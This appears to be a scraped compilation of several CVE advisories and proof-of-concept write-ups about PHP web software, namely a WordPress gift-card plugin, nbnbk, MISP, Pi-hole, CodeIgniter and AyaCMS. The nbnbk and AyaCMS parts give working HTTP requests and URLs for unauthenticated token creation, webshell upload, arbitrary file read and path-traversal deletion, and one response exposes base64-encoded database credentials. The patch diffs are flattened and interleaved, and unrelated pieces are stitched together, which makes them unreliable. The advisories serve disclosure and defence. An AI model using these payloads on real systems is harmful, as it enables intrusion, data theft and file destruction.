WordPress Yith WooCommerce Gift Cards Premium plugin versions 3.19.0 and below suffer from a remote shell upload vulnerability.

Description: Unauthenticated Arbitrary File Upload

Affected Plugin: Yith WooCommerce Gift Cards Premium

Plugin Slug: yith-woocommerce-gift-cards-premium

Affected Versions: <= 3.19.0

CVE ID: CVE-2022-45359

CVSS Score: 9.8 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Researcher/s:  Dave Jong

Fully Patched Version: 3.20.0

We were able to reverse engineer the exploit based on attack traffic and a copy of the vulnerable plugin and are providing information on its functionality as this vulnerability is already being exploited in the wild and a patch has been available for some time.

The issue lies in the import_actions_from_settings_panel function which runs on the admin_init hook.

Since admin_init runs for any page in the /wp-admin/ directory, it is possible to trigger functions that run on admin_init as an unauthenticated attacker by sending a request to /wp-admin/admin-post.php.

Since the import_actions_from_settings_panel function also lacks a capability check and a CSRF check, it is trivial for an attacker to simply send a request containing a page parameter set to yith_woocommerce_gift_cards_panel, a ywgc_safe_submit_field parameter set to importing_gift_cards, and a payload in the file_import_csv file parameter.

Since the function also does not perform any file type checks, any file type including executable PHP files can be uploaded.

Cyber Observables

These attacks may appear in your logs as unexpected POST requests to wp-admin/admin-post.php from unknown IP addresses. Additionally, we have observed the following payloads which may be useful in determining whether your site has been compromised. Note that we are providing normalized hashes (hashes of the file with all extraneous whitespace removed):

kon.php/1tes.php – this file loads a copy of the “marijuana shell” file manager in memory from a remote location at shell[.]prinsh[.]com and has a normalized sha256 hash of 1a3babb9ac0a199289262b6acf680fb3185d432ed1e6b71f339074047078b28c

b.php – this file is a simple uploader with a normalized sha256 hash of 3c2c9d07da5f40a22de1c32bc8088e941cea7215cbcd6e1e901c6a3f7a6f9f19

admin.php – this file is a password-protected backdoor and has a normalized sha256 hash of 8cc74f5fa8847ba70c8691eb5fdf8b6879593459cfd2d4773251388618cac90d

Although we’ve seen attacks from more than a hundred IPs, the vast majority of attacks were from just two IP addresses:

103.138.108.15, which sent out 19604 attacks against 10936 different sites

and

188.66.0.135, which sent 1220 attacks against 928 sites.

The majority of attacks occurred the day after the vulnerability was disclosed, but have been ongoing, with another peak on December 14, 2022. As this vulnerability is trivial to exploit and provides full access to a vulnerable website we expect attacks to continue well into the future.

Recommendations

If you are running a vulnerable version of YITH WooCommerce Gift Cards Premium, that is, any version up to and including 3.19.0, we strongly recommend updating to the latest version available. While the Wordfence firewall does provide protection against malicious file uploads even for free users, attackers may still be able to cause nuisance issues by abusing the vulnerable functionality in less critical ways.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.

If you have any friends or colleagues who are using this plugin, please share this announcement with them and encourage them to update to the latest patched version of YITH WooCommerce Gift Cards Premium as soon as possible.

If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence Community Edition leaderboard.

WordPress Yith WooCommerce Gift Cards Premium 3.19.0 Shell Upload

nbnbk commit 879858451d53261d10f77d4709aee2d01c72c301 was discovered to contain an arbitrary file read vulnerability via the component /api/Index/getFileBinary.

**nbnbk 存在任意文件读取**

Nbnbk has an arbitrary file read vulnerability

POST /api/Index/getFileBinary HTTP/1.1
Host: nbnbk:8888
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

url=../application/database.php

通过修改 url 参数来读取文件，来看返回数据。  
Return data by modifying the url parameter to read the file.

HTTP/1.1 200 OK
Date: Fri, 04 Mar 2022 03:39:37 GMT
Server: Apache/2.4.46 (Unix) mod\_fastcgi/mod\_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod\_wsgi/3.5 Python/2.7.13
X-Powered-By: PHP/7.4.21
Access-Control-Allow-Origin: \*
Access-Control-Allow-Methods: GET,POST
Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
Content-Length: 2784
Connection: close
Content-Type: text/html; charset=UTF-8

{"code":0,"msg":"操作成功","data":"PD9waHAKLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBUaGlua1BIUCBbIFdFIENBTiBETyBJVCBKVVNU\\r\\nIFRISU5LIF0KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBDb3B5cmlnaHQgKGMpIDIwMDZ+MjAxNiBo\\r\\ndHRwOi8vdGhpbmtwaHAuY24gQWxsIHJpZ2h0cyByZXNlcnZlZC4KLy8gKy0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0K\\r\\nLy8gfCBMaWNlbnNlZCAoIGh0dHA6Ly93d3cuYXBhY2hlLm9yZy9saWNlbnNlcy9MSUNFTlNFLTIu\\r\\nMCApCi8vICstLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tCi8vIHwgQXV0aG9yOiBsaXUyMXN0IDxsaXUyMXN0QGdtYWls\\r\\nLmNvbT4KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCi8vIOaVsOaNruW6k+mFjee9ruaWh+S7tgoKcmV0dXJu\\r\\nIFsKICAgIC8vIOaVsOaNruW6k+exu+WeiwogICAgJ3R5cGUnICAgICAgICAgICA9PiAnbXlzcWwn\\r\\nLAogICAgLy8g5pyN5Yqh5Zmo5Zyw5Z2ACiAgICAnaG9zdG5hbWUnICAgICAgID0+ICcxMjcuMC4w\\r\\nLjEnLAogICAgLy8g5pWw5o2u5bqT5ZCNCiAgICAnZGF0YWJhc2UnICAgICAgID0+ICduYm5iaycs\\r\\nCiAgICAvLyDnlKjmiLflkI0KICAgICd1c2VybmFtZScgICAgICAgPT4gJ3Jvb3QnLAogICAgLy8g\\r\\n5a+G56CBCiAgICAncGFzc3dvcmQnICAgICAgID0+ICdwYXNzQCExMjMnLAogICAgLy8g56uv5Y+j\\r\\nCiAgICAnaG9zdHBvcnQnICAgICAgID0+ICc4ODg5JywKICAgIC8vIOi\\/nuaOpWRzbgogICAgJ2Rz\\r\\nbicgICAgICAgICAgICA9PiAnJywKICAgIC8vIOaVsOaNruW6k+i\\/nuaOpeWPguaVsAogICAgJ3Bh\\r\\ncmFtcycgICAgICAgICA9PiBbXSwKICAgIC8vIOaVsOaNruW6k+e8lueggem7mOiupOmHh+eUqHV0\\r\\nZjgKICAgICdjaGFyc2V0JyAgICAgICAgPT4gJ3V0ZjgnLAogICAgLy8g5pWw5o2u5bqT6KGo5YmN\\r\\n57yACiAgICAncHJlZml4JyAgICAgICAgID0+ICdmbF8nLAogICAgLy8g5pWw5o2u5bqT6LCD6K+V\\r\\n5qih5byPCiAgICAnZGVidWcnICAgICAgICAgID0+IGZhbHNlLAogICAgLy8g5pWw5o2u5bqT6YOo\\r\\n572y5pa55byPOjAg6ZuG5Lit5byPKOWNleS4gOacjeWKoeWZqCksMSDliIbluIPlvI8o5Li75LuO\\r\\n5pyN5Yqh5ZmoKQogICAgJ2RlcGxveScgICAgICAgICA9PiAwLAogICAgLy8g5pWw5o2u5bqT6K+7\\r\\n5YaZ5piv5ZCm5YiG56a7IOS4u+S7juW8j+acieaViAogICAgJ3J3X3NlcGFyYXRlJyAgICA9PiBm\\r\\nYWxzZSwKICAgIC8vIOivu+WGmeWIhuemu+WQjiDkuLvmnI3liqHlmajmlbDph48KICAgICdtYXN0\\r\\nZXJfbnVtJyAgICAgPT4gMSwKICAgIC8vIOaMh+WumuS7juacjeWKoeWZqOW6j+WPtwogICAgJ3Ns\\r\\nYXZlX25vJyAgICAgICA9PiAnJywKICAgIC8vIOaYr+WQpuS4peagvOajgOafpeWtl+auteaYr+WQ\\r\\npuWtmOWcqAogICAgJ2ZpZWxkc19zdHJpY3QnICA9PiB0cnVlLAogICAgLy8g5pWw5o2u6ZuG6L+U\\r\\n5Zue57G75Z6LIGFycmF5IOaVsOe7hCBjb2xsZWN0aW9uIENvbGxlY3Rpb27lr7nosaEKICAgICdy\\r\\nZXN1bHRzZXRfdHlwZScgPT4gJ2FycmF5JywKICAgIC8vIOaYr+WQpuiHquWKqOWGmeWFpeaXtumX\\r\\ntOaIs+Wtl+autQogICAgJ2F1dG9fdGltZXN0YW1wJyA9PiBmYWxzZSwKICAgIC8vIOaYr+WQpumc\\r\\ngOimgei\\/m+ihjFNRTOaAp+iDveWIhuaekAogICAgJ3NxbF9leHBsYWluJyAgICA9PiBmYWxzZSwK\\r\\nICAgIC8v5Y+W5raI5YmN5Y+w6Ieq5Yqo5qC85byP5YyWCiAgICAnZGF0ZXRpbWVfZm9ybWF0Jz0+\\r\\nIGZhbHNlLApdOwo=\\r\\n"}

文件信息在 data 字段中，是 base64 编码的格式，但其中包含了大量的 \r\n 导致我们没法直接解码。我们可以通过 js 去将所有 \r\n 删掉。

1.  打开 Google Chrome 游览器
2.  打开一个控制台
3.  输入以下代码

The file information in the data field is in the base64 encoded format, but it contains a large number of \r\n which prevents us from decoding it directly. We can delete all \r\n'through js'.

1.  Open Google Chrome Tour
2.  Open a console
3.  Enter the following code

    a = "$data string"
    a.replaceAll('\r\n', '')
    

演示将上面代码进行转化  
The demonstration transforms the above code

将转化后的数据进行 base64 转码 我使用的是 Google Chrome 插件 FeHelper  
Transcoding the converted data base64 I'm using the Google ChromePlug-inFeHelper

CVE-2022-46492: 🛡️  Nbnbk has an arbitrary file read vulnerability  · Issue #3 · Fanli2012/nbnbk

Pi-Hole is a network-wide ad blocking via your own Linux hardware, AdminLTE is a Pi-hole Dashboard for stats and more. In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on `queryads` endpoint. In the case of application, this vulnerability exists because of a lack of validation in code on a root server path: `/admin/scripts/pi-hole/phpqueryads.php.` Potential threat actor(s) are able to perform an unauthorized query search in blocked domain lists. This could lead to the disclosure for any victims' personal blacklists.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2022-23513: Release v5.18 · pi-hole/AdminLTE

In MISP before 2.4.167, there is XSS in the template file uploads in app/View/Templates/upload_file.ctp.

@@ -6,7 +6,7 @@ if ($batch == 'yes') {

$multiple = false;

if (isset($filenames)) {

$buttonText = \_\_('Replace File');

} else {

} else {

$buttonText = \_\_('Upload File');

}

}

@@ -18,13 +18,13 @@ if ($batch == 'yes') {

echo $this\->Form\->end();

?>

</div\>

<span id\="fileUploadButton\_<?php echo $element\_id; ?>" role\="button" tabindex\="0" aria-label\="<?php echo $buttonText; ?>" title\="<?php echo $buttonText; ?>" class\="btn btn-primary" onClick\="templateFileUploadTriggerBrowse('<?php echo $element\_id; ?>');"\><?php echo $buttonText; ?></span\>

<span id\="fileUploadButton\_<?php echo h($element\_id); ?>" role\="button" tabindex\="0" aria-label\="<?php echo $buttonText; ?>" title\="<?php echo $buttonText; ?>" class\="btn btn-primary" onClick\="templateFileUploadTriggerBrowse(<?php echo json\_encode($element\_id); ?>);"\><?php echo $buttonText; ?></span\>

<script type\="text/javascript"\>

$(document).ready(function() {

<?php if (isset($filenames)): ?>

var fileArray \= JSON.parse('<?php echo $fileArray;?>');

templateFileHiddenAdd(fileArray, '<?php echo $element\_id; ?>', '<?php echo $batch; ?>');

showMessage('<?php echo $upload\_error ? 'fail' : 'success'; ?>', '<?php echo $result; ?>', 'iframe');

templateFileHiddenAdd(fileArray, '<?php echo h($element\_id); ?>', '<?php echo h($batch); ?>');

showMessage('<?php echo $upload\_error ? 'fail' : 'success'; ?>', '<?php echo h($result); ?>', 'iframe');

<?php endif; ?>

});

CVE-2022-47928: fix: [security] XSS in the template file uploads · MISP/MISP@684d3e5

Default version of nbnbk was discovered to contain an arbitrary file upload vulnerability via the component /api/User/download_img.

**nbnbk 存在任意文件上传 Getshell**

Nbnbk has any file upload Getshell

**0x00 前言 Preface**

该漏洞无需账号密码即可任意文件上传 Getshell，相当于两步请求直接获取机器权限。

漏洞存在版本：default

This vulnerability allows any file to be uploaded to the Getshell without an account password, which is equivalent to two-step requests for direct access to the machine.

Vulnerability Existing Version: default

**0x01 漏洞复现 Vulnerability Reproduction****1.获取 token**

文件上传的接口需要 access\_token ，我们可以通过下面这个接口获取

Get token

The interface for file upload requires access\_ Token, we can get it from this interface

POST /api/login/wx\_login HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Connection: close

openid=1&unionid=1&sex=1&head\_img=1&nickname=1

可以在返回包中发现 token 已经生成  
You can find that token has been generated in the return package

    HTTP/1.1 200 OK
    Date: Wed, 02 Mar 2022 01:37:25 GMT
    Server: Apache/2.4.46 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod_wsgi/3.5 Python/2.7.13
    X-Powered-By: PHP/7.4.21
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET,POST
    Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
    Content-Length: 831
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    {"code":0,"msg":"登录成功","data":{"id":10,"parent_id":0,"invite_code":"","mobile":"","email":"","nickname":"1","user_name":"u10","pay_password":0,"head_img":"1","sex":1,"birthday":"1990-01-01","money":"0.00","commission":"0.00","commission_available":"0.00","consumption_money":"0.00","frozen_money":"0.00","point":0,"user_rank":0,"user_rank_points":0,"address_id":0,"openid":"1","unionid":"1","refund_account":"","refund_name":"","signin_time":0,"group_id":50,"status":0,"add_time":1646141434,"update_time":1646141434,"delete_time":0,"login_time":1646185046,"reciever_address":null,"collect_goods_count":0,"bonus_count":0,"status_text":"正常","sex_text":"男","user_rank_text":null,"token":{"id":15,"token":"87b5fd1230df78dad5a62924426a9a6d","type":2,"user_id":10,"data":"","expire_time":1648733458,"add_time":1646141458}}}
    

**2.在 vps 中启动 http 服务**

Start HTTP service in VPS

echo '<?php phpinfo();' \> index.php
python -m http.server 8099

**3.文件上传**

File Upload

POST /api/User/download\_img HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close

access\_token=87b5fd1230df78dad5a62924426a9a6d&url=http://127.0.0.1:8099/index.php&path=info.php

这里的 access\_token 就是上面获取的 token，url 是文件地址，path 是文件名  
Access\_here Token is the token obtained above, URL is the file address, path is the file name.

返回 200 表示成功，我们直接访问 http://nbnbk:8888/info.php 可以看到已经写入文件并能成功解析。

Back to 200 means success, we visit directly http://nbnbk:8888/info.php You can see that the file has been written and parsed successfully.

**0x02 漏洞分析**

Vulnerability Analysis

**1.发现危险函数**

Discover danger function

通过全局搜索 fopen 这个打开文件的函数，发现了 api 下面存在一个 path 用变量来控制，极有肯能存在问题。  
By searching fopen, an open file function globally, we found that there is a path under the API that is controlled by variables, which is probably problematic.

双击后可以发现是一个 download\_img 的函数，其中 url 和 path 变量是可控的。  
Double-click to find a download\_ Function of img where url and path variables are controllable.

这里直接使用 curl 访问了我们提供的 url 并且 path 也没有做任何过滤。直接读文件写到指定目录。  
Curl is used directly here to access the url'we provided and path\` does not filter at all. Read the file directly to the specified directory.

直接构造路近请求但是提示 token 错误，下一步我们需要获得 token。  
Construct the approach request directly but prompt token error, we need to get token next.

**2.获取token**

Get token

看源码可以知道，一定是要登陆才能调用到 getToken 。可以通过注册登陆的方式来获取，但是如果关闭了注册功能、注册功能失效，我们就没法获取 token 了。有没有不需要有账号密码即可获取 token 的方式？

我们继续来看登陆功能的 Login.php 发现提供了一种不需要账号密码就可以登陆的方式。

Looking at the source code, you know that you must be logged in to call getToken'. It can be obtained by registering for login, but if the registration function is turned off and the registration function is invalid, we will not be able to get token'. Is there a way to get \`token'without an account password?

Let's move on to Login'for login functionality. PhpDiscovery provides a way to log in without an account password.

进一步跟进 wxLogin 函数  
Follow Up wxLogin Function

1.  折叠函数里包含了输入内容的校验，大概意思是用户不存在可以创建一个新的，这里我们可以不用管。
2.  通过了校验之后会生成新的 token

1.The collapse function contains a check of the input content, which probably means that the user does not exist and can create a new one, which we can ignore here.

2.New \`token'will be generated after passing the check

我们直接构造数据包，填入需要的字段即可直接拿到生成的 token。到这里分析就结束了。

We construct the data package directly and fill in the required fields to get the generated token. The analysis is over here.

CVE-2022-46493: 🛡️  Nbnbk has any file upload Getshell · Issue #1 · Fanli2012/nbnbk

CodeIgniter is a PHP full-stack web framework. This vulnerability may allow attackers to spoof their IP address when the server is behind a reverse proxy. This issue has been patched, please upgrade to version 4.2.11 or later, and configure `Config\App::$proxyIPs`. As a workaround, do not use `$request->getIPAddress()`.

@@ -11,6 +11,7 @@  
namespace CodeIgniter\\HTTP;  
use CodeIgniter\\Exceptions\\ConfigException; use CodeIgniter\\Validation\\FormatRules;  
/\*\* @@ -43,7 +44,9 @@ trait RequestTrait /\*\* \* Gets the user's IP address. \* \* @return string IP address \* @return string IP address if it can be detected, or empty string. \* If the IP address is not a valid IP address, \* then will return '0.0.0.0'. \*/ public function getIPAddress(): string { @@ -59,93 +62,86 @@ public function getIPAddress(): string /\*\* \* @deprecated $this->proxyIPs property will be removed in the future \*/ // @phpstan-ignore-next-line $proxyIPs = $this\->proxyIPs ?? config('App')->proxyIPs; if (! empty($proxyIPs) && ! is\_array($proxyIPs)) { $proxyIPs = explode(',', str\_replace(' ', '', $proxyIPs)); if (! empty($proxyIPs)) { // @phpstan-ignore-next-line if (! is\_array($proxyIPs) || is\_int(array\_key\_first($proxyIPs))) { throw new ConfigException( 'You must set an array with Proxy IP address key and HTTP header name value in Config\\App::$proxyIPs.' ); } }  
$this\->ipAddress = $this\->getServer('REMOTE\_ADDR');  
if ($proxyIPs) { foreach (\['x-forwarded-for', 'client-ip', 'x-client-ip', 'x-cluster-client-ip'\] as $header) { $spoof = null; $headerObj = $this\->header($header);  
if ($headerObj !== null) { $spoof = $headerObj\->getValue();  
// Some proxies typically list the whole chain of IP // addresses through which the client has reached us. // e.g. client\_ip, proxy\_ip1, proxy\_ip2, etc. sscanf($spoof, '%\[^,\]', $spoof);  
if (! $ipValidator($spoof)) { $spoof = null; } else { break; } } }  
if ($spoof) { foreach ($proxyIPs as $proxyIP) { // Check if we have an IP address or a subnet if (strpos($proxyIP, '/') === false) { // An IP address (and not a subnet) is specified. // We can compare right away. if ($proxyIP === $this\->ipAddress) { // @TODO Extract all this IP address logic to another class. foreach ($proxyIPs as $proxyIP => $header) { // Check if we have an IP address or a subnet if (strpos($proxyIP, '/') === false) { // An IP address (and not a subnet) is specified. // We can compare right away. if ($proxyIP === $this\->ipAddress) { $spoof = $this\->getClientIP($header);  
if ($spoof !== null) { $this\->ipAddress = $spoof; break; }  
continue; }  
// We have a subnet ... now the heavy lifting begins if (! isset($separator)) { $separator = $ipValidator($this\->ipAddress, 'ipv6') ? ':' : '.'; } continue; }  
// If the proxy entry doesn't match the IP protocol - skip it if (strpos($proxyIP, $separator) === false) { continue; } // We have a subnet ... now the heavy lifting begins if (! isset($separator)) { $separator = $ipValidator($this\->ipAddress, 'ipv6') ? ':' : '.'; }  
// Convert the REMOTE\_ADDR IP address to binary, if needed if (! isset($ip, $sprintf)) { if ($separator === ':') { // Make sure we're have the "full" IPv6 format $ip = explode(':', str\_replace('::', str\_repeat(':', 9 - substr\_count($this\->ipAddress, ':')), $this\->ipAddress)); // If the proxy entry doesn't match the IP protocol - skip it if (strpos($proxyIP, $separator) === false) { continue; }  
for ($j = 0; $j < 8; $j++) { $ip\[$j\] = intval($ip\[$j\], 16); } // Convert the REMOTE\_ADDR IP address to binary, if needed if (! isset($ip, $sprintf)) { if ($separator === ':') { // Make sure we're having the "full" IPv6 format $ip = explode(':', str\_replace('::', str\_repeat(':', 9 - substr\_count($this\->ipAddress, ':')), $this\->ipAddress));  
$sprintf = '%016b%016b%016b%016b%016b%016b%016b%016b'; } else { $ip = explode('.', $this\->ipAddress); $sprintf = '%08b%08b%08b%08b'; for ($j = 0; $j < 8; $j++) { $ip\[$j\] = intval($ip\[$j\], 16); }  
$ip = vsprintf($sprintf, $ip); $sprintf = '%016b%016b%016b%016b%016b%016b%016b%016b'; } else { $ip = explode('.', $this\->ipAddress); $sprintf = '%08b%08b%08b%08b'; }  
// Split the netmask length off the network address sscanf($proxyIP, '%\[^/\]/%d', $netaddr, $masklen); $ip = vsprintf($sprintf, $ip); }  
// Again, an IPv6 address is most likely in a compressed form if ($separator === ':') { $netaddr = explode(':', str\_replace('::', str\_repeat(':', 9 - substr\_count($netaddr, ':')), $netaddr)); // Split the netmask length off the network address sscanf($proxyIP, '%\[^/\]/%d', $netaddr, $masklen);  
for ($i = 0; $i < 8; $i++) { $netaddr\[$i\] = intval($netaddr\[$i\], 16); } } else { $netaddr = explode('.', $netaddr); // Again, an IPv6 address is most likely in a compressed form if ($separator === ':') { $netaddr = explode(':', str\_replace('::', str\_repeat(':', 9 - substr\_count($netaddr, ':')), $netaddr));  
for ($i = 0; $i < 8; $i++) { $netaddr\[$i\] = intval($netaddr\[$i\], 16); } } else { $netaddr = explode('.', $netaddr); }  
// Convert to binary and finally compare if (strncmp($ip, vsprintf($sprintf, $netaddr), $masklen) === 0) { $spoof = $this\->getClientIP($header);  
// Convert to binary and finally compare if (strncmp($ip, vsprintf($sprintf, $netaddr), $masklen) === 0) { if ($spoof !== null) { $this\->ipAddress = $spoof; break; } @@ -160,6 +156,34 @@ public function getIPAddress(): string return empty($this\->ipAddress) ? '' : $this\->ipAddress; }  
/\*\* \* Gets the client IP address from the HTTP header. \*/ private function getClientIP(string $header): ?string { $ipValidator = \[ new FormatRules(), 'valid\_ip', \]; $spoof = null; $headerObj = $this\->header($header);  
if ($headerObj !== null) { $spoof = $headerObj\->getValue();  
// Some proxies typically list the whole chain of IP // addresses through which the client has reached us. // e.g. client\_ip, proxy\_ip1, proxy\_ip2, etc. sscanf($spoof, '%\[^,\]', $spoof);  
if (! $ipValidator($spoof)) { $spoof = null; } }  
return $spoof; }  
/\*\* \* Fetch an item from the $\_SERVER array. \*

CVE-2022-23556: Merge pull request from GHSA-ghw3-5qvm-3mqc · codeigniter4/CodeIgniter4@5ca8c99

CodeIgniter is a PHP full-stack web framework. When an application uses (1) multiple session cookies (e.g., one for user pages and one for admin pages) and (2) a session handler is set to `DatabaseHandler`, `MemcachedHandler`, or `RedisHandler`, then if an attacker gets one session cookie (e.g., one for user pages), they may be able to access pages that require another session cookie (e.g., for admin pages). This issue has been patched, please upgrade to version 4.2.11 or later. As a workaround, use only one session cookie.

@@ -358,8 +358,8 @@ same way: unusable during the same request after you destroy the session.  
You may also use the \`\`stop()\`\` method to completely kill the session by removing the old session\_id, destroying all data, and destroying the cookie that contained the session id: by removing the old session ID, destroying all data, and destroying the cookie that contained the session ID:  
.. literalinclude:: sessions/038.php  
@@ -390,26 +390,35 @@ all of the options and their effects. You'll find the following Session related preferences in your \*\*app/Config/App.php\*\* file:  
\============================== ============================================ ================================================= ============================================================================================ Preference Default Options Description \============================== ============================================ ================================================= ============================================================================================ \*\*sessionDriver\*\* CodeIgniter\\\\Session\\\\Handlers\\\\FileHandler CodeIgniter\\\\Session\\\\Handlers\\\\FileHandler The session storage driver to use. CodeIgniter\\\\Session\\\\Handlers\\\\DatabaseHandler CodeIgniter\\\\Session\\\\Handlers\\\\MemcachedHandler CodeIgniter\\\\Session\\\\Handlers\\\\RedisHandler CodeIgniter\\\\Session\\\\Handlers\\\\ArrayHandler \*\*sessionCookieName\*\* ci\_session \[A-Za-z\\\_\-\] characters only The name used for the session cookie. \*\*sessionExpiration\*\* 7200 (2 hours) Time in seconds (integer) The number of seconds you would like the session to last. If you would like a non-expiring session (until browser is closed) set the value to zero: 0 \*\*sessionSavePath\*\* null None Specifies the storage location, depends on the driver being used. \*\*sessionMatchIP\*\* false true/false (boolean) Whether to validate the user's IP address when reading the session cookie. Note that some ISPs dynamically changes the IP, so if you want a non-expiring session you will likely set this to false. \*\*sessionTimeToUpdate\*\* 300 Time in seconds (integer) This option controls how often the session class will regenerate itself and create a new session ID. Setting it to 0 will disable session ID regeneration. \*\*sessionRegenerateDestroy\*\* false true/false (boolean) Whether to destroy session data associated with the old session ID when auto-regenerating the session ID. When set to false, the data will be later deleted by the garbage collector. \============================== ============================================ ================================================= ============================================================================================ \============================== ================== =========================== ============================================================ Preference Default Options Description \============================== ================== =========================== ============================================================ \*\*sessionDriver\*\* FileHandler::class FileHandler::class The session storage driver to use. DatabaseHandler::class All the session drivers are located in the MemcachedHandler::class \`\`CodeIgniter\\Session\\Handlers\\\`\` namespace. RedisHandler::class ArrayHandler::class \*\*sessionCookieName\*\* ci\_session \[A-Za-z\\\_\-\] characters only The name used for the session cookie. The value will be included in the key of the Database/Memcached/Redis session records. So, set the value so that it does not exceed the maximum length of the key. \*\*sessionExpiration\*\* 7200 (2 hours) Time in seconds (integer) The number of seconds you would like the session to last. If you would like a non-expiring session (until browser is closed) set the value to zero: 0 \*\*sessionSavePath\*\* null None Specifies the storage location, depends on the driver being used. \*\*sessionMatchIP\*\* false true/false (boolean) Whether to validate the user's IP address when reading the session cookie. Note that some ISPs dynamically changes the IP, so if you want a non-expiring session you will likely set this to false. \*\*sessionTimeToUpdate\*\* 300 Time in seconds (integer) This option controls how often the session class will regenerate itself and create a new session ID. Setting it to 0 will disable session ID regeneration. \*\*sessionRegenerateDestroy\*\* false true/false (boolean) Whether to destroy session data associated with the old session ID when auto-regenerating the session ID. When set to false, the data will be later deleted by the garbage collector. \============================== ================== =========================== ============================================================  
.. note:: As a last resort, the Session library will try to fetch PHP's session related INI settings, as well as legacy CI settings such as @@ -498,9 +507,9 @@ permissions will probably break your application. Instead, you should do something like this, depending on your environment ::  
mkdir /<path to your application directory>/Writable/sessions/ chmod 0700 /<path to your application directory>/Writable/sessions/ chown www-data /<path to your application directory>/Writable/sessions/ \> mkdir /<path to your application directory>/writable/sessions/ \> chmod 0700 /<path to your application directory>/writable/sessions/ \> chown www-data /<path to your application directory>/writable/sessions/  
Bonus Tip \--------- @@ -518,6 +527,8 @@ In addition, if performance is your only concern, you may want to look into using \`tmpfs <https://eddmann.com/posts/storing-php-sessions-file-caches-in-memory-using-tmpfs/\>\`\_, (warning: external resource), which can make your sessions blazing fast.  
.. \_sessions-databasehandler-driver:  
DatabaseHandler Driver \======================  
@@ -561,6 +572,10 @@ For PostgreSQL::  
CREATE INDEX "ci\_sessions\_timestamp" ON "ci\_sessions" ("timestamp");  
.. note:: The \`\`id\`\` value contains the session cookie name (\`\`Config\\App::$sessionCookieName\`\`) and the session ID and a delimiter. It should be increased as needed, for example, when using long session IDs.  
You will also need to add a PRIMARY KEY \*\*depending on your 'sessionMatchIP' setting\*\*. The examples below work both on MySQL and PostgreSQL::  
@@ -595,6 +610,8 @@ when it generates the code. done processing session data if you're having performance issues.  
.. \_sessions-redishandler-driver:  
RedisHandler Driver \===================  
@@ -631,6 +648,8 @@ sufficient:  
.. literalinclude:: sessions/041.php  
.. \_sessions-memcachedhandler-driver:  
MemcachedHandler Driver \=======================

CVE-2022-46170: Merge pull request from GHSA-6cq5-8cj7-g558 · codeigniter4/CodeIgniter4@f9fb657

AyaCMS 3.1.2 is vulnerable to file deletion via /aya/module/admin/fst_del.inc.php

Vulnerability files: /aya/module/admin/fst\_down.inc.php, /aya/module/admin/fst\_del.inc.php  
Vulnerability description: The check\_path function has flaws in the filtering of parameters passed in by $file. We only need to enter characters other than "./\\" such as aya in the header of the parameter to bypass the detection and download or delete any file in the system.  
1、Arbitrary file download Vulnerability  
  
You can access any file in the system through  
admin.php?action=fst_down&file=aya/table/../../../../../../windows/win.ini  

2、Arbitrary file delete Vulnerability  
  
First I create a file named 111.txt under C:\\Windows  
  
Then the files can be deleted through  
admin.php?action=fst_del&file=aya/../../../../../windows/111.txt&in_ajax=1  
  

3、Arbitrary file upload Vulnerability  

    POST /upload/admin.php?action=fst_upload&file=aya HTTP/1.1
    Host: xx.xx.xx.xx
    Content-Length: 204
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9HCWsLRL4AuZwHyu
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
